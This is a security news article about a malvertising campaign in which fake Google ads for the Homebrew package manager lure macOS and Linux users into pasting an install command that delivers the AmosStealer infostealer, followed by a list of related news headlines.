Fake Homebrew Infects macOS and Linux Machines with infostealer

📟 News

Date: 22/01/2025

Attackers use Google ads to disguise themselves as the Homebrew website and distribute malware targeting Mac and Linux systems and stealing logon credentials, browser data, and cryptocurrency wallets.

The first to discover malicious Google ads was security researcher Ryan Chenkie. According to Bleeping Computer, the malware used in this campaign is AmosStealer (aka Atomic). This infostealer is designed for systems running macOS and is available as a subscription ($1,000 per month).

In the past, this malware was spotted in other malvertising campaigns promoting fake Google Meet pages. According to researchers, AmosStealer is currently the main infostealer for hackers targeting Apple users.

Homebrew is a third-party package manager for macOS and Linux whose popularity is being exploited by criminals. Malvertisements spotted on Google displayed the correct URL brew.sh, which misled even users familiar with the project. However, these ads actually redirected victims to a fake Homebrew website located at brewe[.]sh.

Malicious ad (source: @ryanchenkie)
Malicious ad (source: @ryanchenkie)

It must be noted that malefactors have been using this tactics (i.e. displaying trusted URLs in their ads to trick users into visiting supposedly official sites) for a long time. Earlier, experts found similar malicious ads disguised as Google Authenticator and Google Ads.

In the new malware campaign, the potential victim goes to a fake website and is prompted to install Homebrew by pasting a command shown in the macOS Terminal or a Linux shell prompt. Importantly, the real Homebrew website prompts the user to execute a similar command to install legitimate software. But after executing the command on the fake website, the Amos infostealer is downloaded to the user’s device; this malware targets over 50 cryptocurrency extensions, desktop wallets (including Binance, Coinomi, Electrum, and Exodus), and data stored on web browsers.

Fake website (source: @ryanchenkie)
Fake website (source: @ryanchenkie)

Homebrew’s project leader, Mike McQuaid, told journalists that the Homebrew developers are aware of the situation, but emphasized that it’s beyond their control, criticizing Google for its lack of scrutiny.

There’s little we can do about this really, it keeps happening again and again and Google seems to like taking money from scammers. Please signal-boost this and hopefully someone at Google will fix this for good”, – McQuaid said.

Related posts:
2025.03.26 — Cloudflare to block all unencrypted traffic to its APIs

According to Cloudflare, effective immediately, only secure HTTPS connections to api.cloudflare.com will be accepted; while all HTTP ports are to be closed. The purpose of this decision…

Full article →
2025.03.12 — Mass exploitation of PHP-CGI vulnerability in attacks targeting Japanese companies

GreyNoise and Cisco Talos experts warn that hackers are actively exploiting CVE-2024-4577, a critical PHP-CGI vulnerability that was discovered and fixed in early June 2024. CVE-2024-457…

Full article →
2025.02.28 — Qualcomm extends support for Android devices to 8 years

Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…

Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management

Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…

Full article →
2025.04.08 — Website of Everest ransomware group hacked and defaced

Last weekend, the darknet website of the Everest ransomware group was hacked and went offline. The attackers replaced its content with a sarcastic message: "Don't do crime…

Full article →
2025.02.25 — More than 100,000 users downloaded SpyLend malware from Google Play Store

According to Cyfirma, a malicious Android app called SpyLend was available on the official Google Play Store for some time and has been downloaded from there…

Full article →
2025.02.18 — Chrome Enhanced Protection mode is now powered by AI

The Enhanced Protection mode in Google Chrome has been updated. Now it uses AI to protect users from dangerous sites, downloads, and extensions in real time.…

Full article →
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members

The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…

Full article →
2025.01.29 — Google to disable Sync in older Chrome versions

Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…

Full article →
2025.04.12 — Hackers compromised a bureau within the U.S. Department of the Treasury and spent months in hacked systems

The Office of the Comptroller of the Currency (OCC), an independent bureau within the United States Department of the Treasury, reported a major cybersecurity incident. Unknown attackers had…

Full article →